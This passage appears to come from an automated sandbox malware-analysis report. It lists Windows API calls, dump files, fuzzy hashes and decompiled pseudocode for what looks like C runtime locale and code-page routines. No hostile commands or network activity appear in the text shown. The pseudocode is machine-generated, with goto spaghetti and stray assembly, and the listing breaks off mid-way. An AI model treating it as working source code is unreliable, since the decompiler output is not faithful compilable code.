                                                0x00000000
                                                0x00000000
                                                0x001c184a
                                                0x001c1822
                                                0x001c1856

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001C1583,00000000,00000000,?), ref: 001C1815
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: a54db48eff7f8f6d1fb7f9c0e29d8a1d893355b20ccbe29d2c8dadc37b0323c2
                                                • Instruction ID: 5682cffbf22478fba0de50ed0454a9eaa76879be0e3e8fa9990a332027f9ecbe
                                                • Opcode Fuzzy Hash: a54db48eff7f8f6d1fb7f9c0e29d8a1d893355b20ccbe29d2c8dadc37b0323c2
                                                • Instruction Fuzzy Hash: 8DF02D369841117BDB285760CC05FFA7768EF51754F05442CEC05A3181EB70FD41C6D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001C12DC(void* __ecx, void* __edx, signed char* _a4) {
                                                				void* __esi;
                                                				intOrPtr _t11;
                                                				signed char* _t15;
                                                				intOrPtr* _t19;
                                                				intOrPtr _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t27;
                                                
                                                				_t27 = E001B782A(__ecx, __edx, _t26);
                                                				_t24 = 2;
                                                				_t19 =  *((intOrPtr*)(_t27 + 0x50));
                                                				_t25 = _t19 + 2;
                                                				do {
                                                					_t11 =  *_t19;
                                                					_t19 = _t19 + _t24;
                                                				} while (_t11 != 0);
                                                				_t4 = _t19 - _t25 >> 1 == 3;
                                                				 *(_t27 + 0x60) = 0 | _t4;
                                                				if(_t4 != 0) {
                                                					_t24 = E001C133B( *((intOrPtr*)(_t27 + 0x50)));
                                                				}
                                                				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
                                                				EnumSystemLocalesW(E001C15BA, 1);
                                                				_t15 = _a4;
                                                				if(( *_t15 & 0x00000004) == 0) {
                                                					 *_t15 = 0;
                                                					return _t15;
                                                				}
                                                				return _t15;
                                                			}











                                                0x001c12e9
                                                0x001c12ef
                                                0x001c12f0
                                                0x001c12f3
                                                0x001c12f6
                                                0x001c12f6
                                                0x001c12f9
                                                0x001c12fb
                                                0x001c1309
                                                0x001c130c
                                                0x001c130f
                                                0x001c131a
                                                0x001c131a
                                                0x001c1323
                                                0x001c1326
                                                0x001c132c
                                                0x001c1332
                                                0x001c1334
                                                0x00000000
                                                0x001c1334
                                                0x001c133a

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • EnumSystemLocalesW.KERNEL32(001C15BA,00000001,?,?,-00000050,?,001C195C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001C1326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: e89732145c64bbd5d22df6fa8635ec98ca36002f345cd272a68320cb4384c798
                                                • Instruction ID: d268d90a95a0e9493f77a38111781250497e03dea06c19b42bd7db79ef108596
                                                • Opcode Fuzzy Hash: e89732145c64bbd5d22df6fa8635ec98ca36002f345cd272a68320cb4384c798
                                                • Instruction Fuzzy Hash: 99F022362043046FCB245F349881FAA7B91FF92728B14842DFA028BA82D3B1DC03CA40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E001B8708(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _t17;
                                                				signed int _t29;
                                                				void* _t31;
                                                
                                                				_push(0xc);
                                                				_push(0x1d42c0);
                                                				E001AA2B0(__ebx, __edi, __esi);
                                                				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
                                                				E001AFF95( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
                                                				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                                                				 *0x203458 = E001B3546( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
                                                				_t29 = EnumSystemLocalesW(E001B86FB, 1);
                                                				_t17 =  *0x1d5010; // 0x8121a627
                                                				 *0x203458 = _t17;
                                                				 *(_t31 - 0x1c) = _t29;
                                                				 *(_t31 - 4) = 0xfffffffe;
                                                				E001B8778();
                                                				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
                                                				return _t29;
                                                			}






                                                0x001b8708
                                                0x001b870a
                                                0x001b870f
                                                0x001b8714
                                                0x001b871d
                                                0x001b8723
                                                0x001b8734
                                                0x001b8746
                                                0x001b8748
                                                0x001b874d
                                                0x001b8752
                                                0x001b8755
                                                0x001b875c
                                                0x001b8766
                                                0x001b8772

                                                APIs
                                                  • Part of subcall function 001AFF95: EnterCriticalSection.KERNEL32(?,?,001B7502,?,001D4200,00000008,001B76C6,?,?,?), ref: 001AFFA4
                                                • EnumSystemLocalesW.KERNEL32(001B86FB,00000001,001D42C0,0000000C,001B8B2A,00000000), ref: 001B8740
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 1823130d366ada9580dd0fd686b54e6325bbe941f853aceab954b191c0896de4
                                                • Instruction ID: 8bf5eb2caa33d1b43af4935026379d107c462eb5f81e3172a458e90c05844393
                                                • Opcode Fuzzy Hash: 1823130d366ada9580dd0fd686b54e6325bbe941f853aceab954b191c0896de4
                                                • Instruction Fuzzy Hash: E3F04976A04300EFD711EF98E842B9D7BF0EB15721F10816AF410DB2A2CB759A40CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001C11F6(void* __ecx, void* __edx, signed char* _a4) {
                                                				void* __esi;
                                                				intOrPtr _t9;
                                                				signed char* _t13;
                                                				intOrPtr* _t15;
                                                				void* _t19;
                                                				void* _t21;
                                                				void* _t22;
                                                
                                                				_t19 = E001B782A(__ecx, __edx, _t21);
                                                				_t15 =  *((intOrPtr*)(_t19 + 0x54));
                                                				_t22 = _t15 + 2;
                                                				do {
                                                					_t9 =  *_t15;
                                                					_t15 = _t15 + 2;
                                                				} while (_t9 != 0);
                                                				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
                                                				EnumSystemLocalesW(0x1c114f, 1);
                                                				_t13 = _a4;
                                                				if(( *_t13 & 0x00000004) == 0) {
                                                					 *_t13 = 0;
                                                					return _t13;
                                                				}
                                                				return _t13;
                                                			}










                                                0x001c1202
                                                0x001c1206
                                                0x001c1209
                                                0x001c120c
                                                0x001c120c
                                                0x001c120f
                                                0x001c1212
                                                0x001c122a
                                                0x001c122d
                                                0x001c1233
                                                0x001c1239
                                                0x001c123b
                                                0x00000000
                                                0x001c123b
                                                0x001c1240

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • EnumSystemLocalesW.KERNEL32(001C114F,00000001,?,?,?,001C19BA,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C122D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: dfef80c8485e5feff697f64479b0272a8d32f16b38a50da95ede78818ca1226c
                                                • Instruction ID: d3f574d826c1ab3e1dbf36c6eb2b433183cc497cfc103d09a31a1e89b4c3fbf6
                                                • Opcode Fuzzy Hash: dfef80c8485e5feff697f64479b0272a8d32f16b38a50da95ede78818ca1226c
                                                • Instruction Fuzzy Hash: CBF0553A34020967CB04AF39D805BAA7F95EFC2B10B4A409DFB19CB281C371D843C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001B52DE,?,20001004,00000000,00000002,?,?,001B48E0), ref: 001B8C62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 1e39e13974d8484daa36949dee79f0ffd059e6c7c2cc6827e069bae8f37d265a
                                                • Instruction ID: 5c99dd014c3b3a47ee3f6a1e6b7db86c21ca0ebef869210b65bbb8c5d3b225cd
                                                • Opcode Fuzzy Hash: 1e39e13974d8484daa36949dee79f0ffd059e6c7c2cc6827e069bae8f37d265a
                                                • Instruction Fuzzy Hash: 2AE04F31541218BBCF122F61DC05EEE3F19EF54F61F044421FD05661A1CF718960EAA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001C1B1A() {
                                                				signed int _t3;
                                                
                                                				_t3 = GetProcessHeap();
                                                				 *0x203554 = _t3;
                                                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                			}




                                                0x001c1b1a
                                                0x001c1b22
                                                0x001c1b2a

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: a47c8b7d190112ac1358a6795b20c5c09e2410650d8518aad2e14be5d49df623
                                                • Instruction ID: 492189756ccc375211c7d3ebf1011c729fcba4f545f26f5afdfcf8b5102442fb
                                                • Opcode Fuzzy Hash: a47c8b7d190112ac1358a6795b20c5c09e2410650d8518aad2e14be5d49df623
                                                • Instruction Fuzzy Hash: D5A011B0202200CF83028F3AAE0820A3FA8AA0A2A03008028A000C02B0EA2880A08B00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fdb5c42691373dd2ef15e74dafadd33005faed21cce165a3c6bfdd8d194ae83
                                                • Instruction ID: ac8af2d127a93e237b767dc4f0aeb2c8e9f7de585c3ec15229a9e29693d78790
                                                • Opcode Fuzzy Hash: 4fdb5c42691373dd2ef15e74dafadd33005faed21cce165a3c6bfdd8d194ae83
                                                • Instruction Fuzzy Hash: 01322322D29F414DD7239634D87237AAA8DAFB73C4F15C727E81AB5DA5EB29C4C34140
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E001C0A05(void* __ebx, void* __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                				signed int _v8;
                                                				intOrPtr _v20;
                                                				signed int _v32;
                                                				char _v36;
                                                				char _v136;
                                                				signed int _v140;
                                                				intOrPtr* _v168;
                                                				signed int _v180;
                                                				char _v272;
                                                				char _v420;
                                                				signed int _v448;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t93;
                                                				signed int _t97;
                                                				void* _t99;
                                                				intOrPtr _t111;
                                                				void* _t113;
                                                				signed int _t115;
                                                				signed int _t119;
                                                				intOrPtr _t127;
                                                				intOrPtr _t137;
                                                				signed int _t139;
                                                				signed int _t140;
                                                				signed int _t143;
                                                				intOrPtr _t146;
                                                				intOrPtr _t149;
                                                				intOrPtr _t150;
                                                				intOrPtr _t152;
                                                				void* _t161;
                                                				intOrPtr _t163;
                                                				void* _t166;
                                                				void* _t168;
                                                				intOrPtr _t169;
                                                				intOrPtr _t170;
                                                				signed int _t172;
                                                				void* _t173;
                                                				void* _t175;
                                                				intOrPtr* _t176;
                                                				signed int _t196;
                                                				intOrPtr* _t198;
                                                				intOrPtr* _t209;
                                                				signed int _t211;
                                                				intOrPtr* _t212;
                                                				intOrPtr* _t217;
                                                				intOrPtr* _t220;
                                                				void* _t221;
                                                				intOrPtr* _t224;
                                                				signed int _t227;
                                                				intOrPtr* _t229;
                                                				intOrPtr* _t231;
                                                				intOrPtr* _t233;
                                                				void* _t235;
                                                				void* _t236;
                                                				intOrPtr _t237;
                                                				intOrPtr _t238;
                                                				intOrPtr* _t239;
                                                				intOrPtr* _t242;
                                                				intOrPtr* _t243;
                                                				signed int _t244;
                                                				void* _t245;
                                                				void* _t246;
                                                				void* _t247;
                                                				signed int _t248;
                                                				signed int _t249;
                                                				signed int _t250;
                                                				void* _t252;
                                                				signed int _t253;
                                                
                                                				_t234 = __edx;
                                                				_t171 = __ebx;
                                                				_t93 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t93 ^ _t249;
                                                				_t242 = _a4;
                                                				_t246 = E001B782A(__ecx, __edx, _t245);
                                                				asm("sbb ecx, ecx");
                                                				_t97 = E001B8C2E(_t242, ( ~( *(_t246 + 0x64)) & 0xfffff005) + 0x1002,  &_v136, 0x40);
                                                				if(_t97 != 0) {
                                                					_push(__ebx);
                                                					_t99 = E001BDE74(_t242, _t246,  *((intOrPtr*)(_t246 + 0x54)),  &_v136);
                                                					_t172 = 0;
                                                					_v140 = 0;
                                                					if(_t99 != 0) {
                                                						L15:
                                                						if(( *(_t246 + 0x58) & 0x00000300) == 0x300) {
                                                							L47:
                                                							_t105 =  !( *(_t246 + 0x58) >> 2) & 0x00000001;
                                                							goto L48;
                                                						} else {
                                                							asm("sbb ecx, ecx");
                                                							if(E001B8C2E(_t242, ( ~( *(_t246 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
                                                								if(E001BDE74(_t242, _t246,  *((intOrPtr*)(_t246 + 0x50)),  &_v136) != 0) {
                                                									goto L47;
                                                								} else {
                                                									_t196 =  *(_t246 + 0x58) | 0x00000200;
                                                									 *(_t246 + 0x58) = _t196;
                                                									if( *(_t246 + 0x60) == _t172) {
                                                										if( *((intOrPtr*)(_t246 + 0x5c)) == _t172) {
                                                											L43:
                                                											_t62 = _t246 + 0x2a0; // 0x2a0
                                                											_t234 = _t62;
                                                											 *(_t246 + 0x58) = _t196 | 0x00000100;
                                                											if( *_t62 != _t172) {
                                                												goto L47;
                                                											} else {
                                                												_t198 = _t242;
                                                												_t173 = _t198 + 2;
                                                												do {
                                                													_t111 =  *_t198;
                                                													_t198 = _t198 + 2;
                                                												} while (_t111 != _v140);
                                                												goto L46;
                                                											}
                                                										} else {
                                                											_t239 =  *((intOrPtr*)(_t246 + 0x50));
                                                											_t175 = _t239 + 2;
                                                											do {
                                                												_t146 =  *_t239;
                                                												_t239 = _t239 + 2;
                                                											} while (_t146 != _v140);
                                                											_t241 = _t239 - _t175 >> 1;
                                                											if(_t239 - _t175 >> 1 !=  *((intOrPtr*)(_t246 + 0x5c))) {
                                                												_t172 = 0;
                                                												goto L43;
                                                											} else {
                                                												if(E001C0E9A(_t175, _t196, _t241, _t242, _t242) != 0) {
                                                													L38:
                                                													 *(_t246 + 0x58) =  *(_t246 + 0x58) | 0x00000100;
                                                													_t59 = _t246 + 0x2a0; // 0x2a0
                                                													_t234 = _t59;
                                                													if( *_t59 != 0) {
                                                														goto L47;
                                                													} else {
                                                														_t220 = _t242;
                                                														_t173 = _t220 + 2;
                                                														do {
                                                															_t149 =  *_t220;
                                                															_t220 = _t220 + 2;
                                                														} while (_t149 != _v140);
                                                														goto L46;
                                                													}
                                                												} else {
                                                													_t176 =  *((intOrPtr*)(_t246 + 0x50));
                                                													_t234 = 0;
                                                													_t221 = _t176 + 2;
                                                													do {
                                                														_t150 =  *_t176;
                                                														_t176 = _t176 + 2;
                                                													} while (_t150 != 0);
                                                													if(E001C09D1( *((intOrPtr*)(_t246 + 0x50))) == _t176 - _t221 >> 1) {
                                                														goto L47;
                                                													} else {
                                                														goto L38;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_t45 = _t246 + 0x2a0; // 0x2a0
                                                										_t234 = _t45;
                                                										 *(_t246 + 0x58) = _t196 | 0x00000100;
                                                										if( *_t45 != _t172) {
                                                											goto L47;
                                                										} else {
                                                											_t224 = _t242;
                                                											_t173 = _t224 + 2;
                                                											do {
                                                												_t152 =  *_t224;
                                                												_t224 = _t224 + 2;
                                                											} while (_t152 != _v140);
                                                											L46:
                                                											_t200 = _t198 - _t173 >> 1;
                                                											_push((_t198 - _t173 >> 1) + 1);
                                                											_t113 = E001BE13A(_t198 - _t173 >> 1, _t234, 0x55, _t242);
                                                											_t253 = _t252 + 0x10;
                                                											if(_t113 != 0) {
                                                												_t172 = 0;
                                                												goto L51;
                                                											} else {
                                                												goto L47;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								 *(_t246 + 0x58) = _t172;
                                                								goto L18;
                                                							}
                                                						}
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						if(E001B8C2E(_t242, ( ~( *(_t246 + 0x60)) & 0xfffff002) + 0x1001,  &_v136, 0x40) != 0) {
                                                							_t161 = E001BDE74(_t242, _t246,  *((intOrPtr*)(_t246 + 0x50)),  &_v136);
                                                							_t227 =  *(_t246 + 0x58);
                                                							if(_t161 != 0) {
                                                								if((_t227 & 0x00000002) != 0) {
                                                									goto L15;
                                                								} else {
                                                									if( *((intOrPtr*)(_t246 + 0x5c)) == 0) {
                                                										L19:
                                                										if(( *(_t246 + 0x58) & 0x00000001) != 0 || E001C0E9A(_t172, _t227, _t234, _t242, _t242) == 0) {
                                                											goto L15;
                                                										} else {
                                                											 *(_t246 + 0x58) =  *(_t246 + 0x58) | 0x00000001;
                                                											_t229 = _t242;
                                                											_t234 = _t229 + 2;
                                                											do {
                                                												_t163 =  *_t229;
                                                												_t229 = _t229 + 2;
                                                											} while (_t163 != _t172);
                                                											goto L14;
                                                										}
                                                									} else {
                                                										_t168 = E001C4FE0(0, _t242, _t246,  *((intOrPtr*)(_t246 + 0x50)),  &_v136,  *((intOrPtr*)(_t246 + 0x5c)));
                                                										_t252 = _t252 + 0xc;
                                                										if(_t168 != 0) {
                                                											goto L19;
                                                										} else {
                                                											 *(_t246 + 0x58) =  *(_t246 + 0x58) | 0x00000002;
                                                											_t231 = _t242;
                                                											_t234 = _t231 + 2;
                                                											do {
                                                												_t169 =  *_t231;
                                                												_t231 = _t231 + 2;
                                                											} while (_t169 != 0);
                                                											goto L14;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								 *(_t246 + 0x58) = _t227 | 0x00000304;
                                                								_t233 = _t242;
                                                								_t234 = _t233 + 2;
                                                								do {
                                                									_t170 =  *_t233;
                                                									_t233 = _t233 + 2;
                                                								} while (_t170 != 0);
                                                								L14:
                                                								_t200 = _t229 - _t234 >> 1;
                                                								_push((_t229 - _t234 >> 1) + 1);
                                                								_t29 = _t246 + 0x2a0; // 0x2a0
                                                								_t166 = E001BE13A(_t229 - _t234 >> 1, _t29, 0x55, _t242);
                                                								_t253 = _t252 + 0x10;
                                                								if(_t166 != 0) {
                                                									L51:
                                                									_push(_t172);
                                                									_push(_t172);
                                                									_push(_t172);
                                                									_push(_t172);
                                                									_push(_t172);
                                                									E001AFE70();
                                                									asm("int3");
                                                									_push(_t249);
                                                									_t250 = _t253;
                                                									_t115 =  *0x1d5010; // 0x8121a627
                                                									_v180 = _t115 ^ _t250;
                                                									_push(_t246);
                                                									_push(_t242);
                                                									_t243 = _v168;
                                                									_t247 = E001B782A(_t200, _t234, _t246);
                                                									asm("sbb ecx, ecx");
                                                									_t119 = E001B8C2E(_t243, ( ~( *(_t247 + 0x60)) & 0xfffff002) + 0x1001,  &_v420, 0x78);
                                                									if(_t119 != 0) {
                                                										if(E001BDE74(_t243, _t247,  *((intOrPtr*)(_t247 + 0x50)),  &_v272) != 0) {
                                                											L58:
                                                											_t125 =  !( *(_t247 + 0x58) >> 2) & 0x00000001;
                                                											goto L59;
                                                										} else {
                                                											_t209 = _t243;
                                                											_push(_t172);
                                                											_t234 = _t209 + 2;
                                                											do {
                                                												_t127 =  *_t209;
                                                												_t209 = _t209 + 2;
                                                											} while (_t127 != 0);
                                                											_t211 = _t209 - _t234 >> 1;
                                                											_push(_t211 + 1);
                                                											_t79 = _t247 + 0x2a0; // 0x2a0
                                                											if(E001BE13A(_t211, _t79, 0x55, _t243) != 0) {
                                                												_push(0);
                                                												_push(0);
                                                												_push(0);
                                                												_push(0);
                                                												_push(0);
                                                												E001AFE70();
                                                												asm("int3");
                                                												_push(_t250);
                                                												_push(_t211);
                                                												_push(_t247);
                                                												_t248 = _v448;
                                                												_push(_t243);
                                                												if(_t248 == 0) {
                                                													L87:
                                                													_push(2);
                                                													_push( &_v36);
                                                													_push(0x20001004);
                                                												} else {
                                                													_t244 = 0;
                                                													if( *_t248 == 0) {
                                                														goto L87;
                                                													} else {
                                                														_t212 = L"ACP";
                                                														_t139 = _t248;
                                                														while(1) {
                                                															_t235 =  *_t139;
                                                															if(_t235 !=  *_t212) {
                                                																break;
                                                															}
                                                															if(_t235 == 0) {
                                                																L68:
                                                																_t140 = _t244;
                                                															} else {
                                                																_t238 =  *((intOrPtr*)(_t139 + 2));
                                                																if(_t238 !=  *((intOrPtr*)(_t212 + 2))) {
                                                																	break;
                                                																} else {
                                                																	_t139 = _t139 + 4;
                                                																	_t212 = _t212 + 4;
                                                																	if(_t238 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L68;
                                                																	}
                                                																}
                                                															}
                                                															L70:
                                                															if(_t140 == 0) {
                                                																goto L87;
                                                															} else {
                                                																if(E001BDE74(_t244, _t248, _t248, L"utf8") == 0 || E001BDE74(_t244, _t248, _t248, L"utf-8") == 0) {
                                                																	L84:
                                                																	return 0xfde9;
                                                																}
                                                																_t217 = L"OCP";
                                                																_t143 = _t248;
                                                																while(1) {
                                                																	_t236 =  *_t143;
                                                																	if(_t236 !=  *_t217) {
                                                																		break;
                                                																	}
                                                																	if(_t236 != 0) {
                                                																		_t237 =  *((intOrPtr*)(_t143 + 2));
                                                																		if(_t237 !=  *((intOrPtr*)(_t217 + 2))) {
                                                																			break;
                                                																		} else {
                                                																			_t143 = _t143 + 4;
                                                																			_t217 = _t217 + 4;
                                                																			if(_t237 != 0) {
                                                																				continue;
                                                																			} else {
                                                																			}
                                                																		}
                                                																	}
                                                																	L80:
                                                																	if(_t244 != 0) {
                                                																		return E001B629E(_t248);
                                                																	}
                                                																	_push(2);
                                                																	_push( &_v36);
                                                																	_push(0x2000000b);
                                                																	goto L82;
                                                																}
                                                																asm("sbb edi, edi");
                                                																_t244 = _t244 | 0x00000001;
                                                																goto L80;
                                                															}
                                                															goto L82;
                                                														}
                                                														asm("sbb eax, eax");
                                                														_t140 = _t139 | 0x00000001;
                                                														goto L70;
                                                													}
                                                												}
                                                												L82:
                                                												_push(_v20 + 0x250);
                                                												if(E001B8C2E() == 0) {
                                                													return 0;
                                                												}
                                                												_t137 = _v36;
                                                												if(_t137 < 3) {
                                                													goto L84;
                                                												}
                                                												return _t137;
                                                											} else {
                                                												 *(_t247 + 0x58) =  *(_t247 + 0x58) | 0x00000004;
                                                												_pop(_t172);
                                                												goto L58;
                                                											}
                                                										}
                                                									} else {
                                                										 *(_t247 + 0x58) =  *(_t247 + 0x58) & _t119;
                                                										_t125 = _t119 + 1;
                                                										L59:
                                                										return E001A9545(_t125, _t172, _v32 ^ _t250, _t234, _t243, _t247);
                                                									}
                                                								} else {
                                                									goto L15;
                                                								}
                                                							}
                                                						} else {
                                                							 *(_t246 + 0x58) =  *(_t246 + 0x58) & 0;
                                                							L18:
                                                							_t105 = 1;
                                                							L48:
                                                							_pop(_t171);
                                                							goto L49;
                                                						}
                                                					}
                                                				} else {
                                                					 *(_t246 + 0x58) =  *(_t246 + 0x58) & _t97;
                                                					_t105 = _t97 + 1;
                                                					L49:
                                                					return E001A9545(_t105, _t171, _v8 ^ _t249, _t234, _t242, _t246);
                                                				}
                                                			}







































































                                                0x001c0a05
                                                0x001c0a05
                                                0x001c0a10
                                                0x001c0a17
                                                0x001c0a1c
                                                0x001c0a24
                                                0x001c0a34
                                                0x001c0a44
                                                0x001c0a4b
                                                0x001c0a56
                                                0x001c0a61
                                                0x001c0a66
                                                0x001c0a68
                                                0x001c0a72
                                                0x001c0b35
                                                0x001c0b41
                                                0x001c0cbc
                                                0x001c0cc4
                                                0x00000000
                                                0x001c0b47
                                                0x001c0b54
                                                0x001c0b6c
                                                0x001c0bb6
                                                0x00000000
                                                0x001c0bbc
                                                0x001c0bbf
                                                0x001c0bc5
                                                0x001c0bcb
                                                0x001c0c01
                                                0x001c0c7c
                                                0x001c0c82
                                                0x001c0c82
                                                0x001c0c88
                                                0x001c0c8e
                                                0x00000000
                                                0x001c0c90
                                                0x001c0c90
                                                0x001c0c92
                                                0x001c0c95
                                                0x001c0c95
                                                0x001c0c98
                                                0x001c0c9b
                                                0x00000000
                                                0x001c0c95
                                                0x001c0c03
                                                0x001c0c03
                                                0x001c0c06
                                                0x001c0c09
                                                0x001c0c09
                                                0x001c0c0c
                                                0x001c0c0f
                                                0x001c0c1a
                                                0x001c0c1f
